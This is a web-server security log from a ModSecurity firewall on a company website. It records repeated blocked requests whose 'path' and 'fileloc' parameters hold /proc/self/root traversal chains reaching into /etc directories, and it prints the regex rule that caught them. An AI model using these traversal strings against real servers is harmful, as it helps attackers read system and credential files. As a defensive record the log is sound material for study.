[Wed Mar 18 10:01:29.850857 2026] [:error] [pid 29882:tid 140411649607424] [client 74.7.243.128:57886] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqiKUzinOy1jxa1j4cMoQAAAQs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:01:58.325000 2026] [:error] [pid 29882:tid 140411599251200] [client 74.7.241.31:34638] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqiRkzinOy1jxa1j4cM5wAAARE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:02:20.331470 2026] [:error] [pid 26799:tid 140411616036608] [client 74.7.241.31:50670] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqiXNa6ubjKNq_cu4aR6QAAA08"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:02:35.335935 2026] [:error] [pid 19507:tid 140411590858496] [client 74.7.241.31:47264] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqia9Y0UrI5A3LftIydfAAAAZI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:03:18.386618 2026] [:error] [pid 15826:tid 140411708356352] [client 74.7.241.31:33910] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqiluoXxyEfFpUF8f9mpgAAAUQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:03:19.770352 2026] [:error] [pid 19507:tid 140411725141760] [client 74.7.241.31:41402] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqil9Y0UrI5A3LftIydkQAAAYI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:03:22.090590 2026] [:error] [pid 17653:tid 140411699963648] [client 74.7.244.43:50678] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abqimsdf6f5d65gmYZTNPwAAAsU"]
[Wed Mar 18 10:03:24.868384 2026] [:error] [pid 19507:tid 140411540502272] [client 74.7.228.61:36652] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abqinNY0UrI5A3LftIydmAAAAZg"]
[Wed Mar 18 10:03:32.250953 2026] [:error] [pid 26799:tid 140411624429312] [client 74.7.243.128:38728] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqipNa6ubjKNq_cu4aSDAAAA04"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 10:03:36.535431 2026] [:error] [pid 11816:tid 140411699963648] [client 74.7.243.128:38730] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqiqOw_le52K8_3pV3YSgAAAgU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 10:03:41.858904 2026] [:error] [pid 11816:tid 140411674785536] [client 74.7.243.128:38746] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqirew_le52K8_3pV3YUQAAAgg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 10:03:43.240779 2026] [:error] [pid 19507:tid 140411641214720] [client 74.7.241.31:41414] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqir9Y0UrI5A3LftIydsAAAAYw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:03:53.024978 2026] [:error] [pid 17887:tid 140411658000128] [client 74.7.241.31:48416] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqiuQkwaGbbGflqUZAIqgAAAMo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:04:04.533800 2026] [:error] [pid 26799:tid 140411683178240] [client 74.7.243.128:41364] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqixNa6ubjKNq_cu4aSUQAAA0c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 10:04:05.843367 2026] [:error] [pid 31803:tid 140411674785536] [client 74.7.243.128:41562] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqixeyqAr6etmhZHNq39wAAAEg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 10:04:13.773229 2026] [:error] [pid 15051:tid 140411683178240] [client 74.7.243.128:41574] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqizSmAPhZkrhU8w4llxgAAAIc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 10:04:17.731475 2026] [:error] [pid 17653:tid 140411658000128] [client 74.7.241.31:35178] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqi0cdf6f5d65gmYZTNcQAAAso"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:04:28.078543 2026] [:error] [pid 17887:tid 140411607643904] [client 74.7.241.31:48374] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqi2wkwaGbbGflqUZAItQAAANA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:04:45.338552 2026] [:error] [pid 19507:tid 140411658000128] [client 74.7.243.128:35904] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqi7dY0UrI5A3LftIyeDgAAAYo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:04:50.025915 2026] [:error] [pid 29882:tid 140411590858496] [client 74.7.243.128:43878] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dir_colors"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqi8kzinOy1jxa1j4cNfgAAARI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:04:51.259857 2026] [:error] [pid 30077:tid 140411708356352] [client 74.7.243.128:59370] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqi8_u8EFLIOrSqIpv9ogAAAkQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:04:57.545250 2026] [:error] [pid 15051:tid 140411641214720] [client 74.7.243.128:59380] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqi-SmAPhZkrhU8w4ll4AAAAIw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:05:02.295493 2026] [:error] [pid 19507:tid 140411641214720] [client 74.7.241.31:33502] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqi_tY0UrI5A3LftIyeKwAAAYw"], referer: 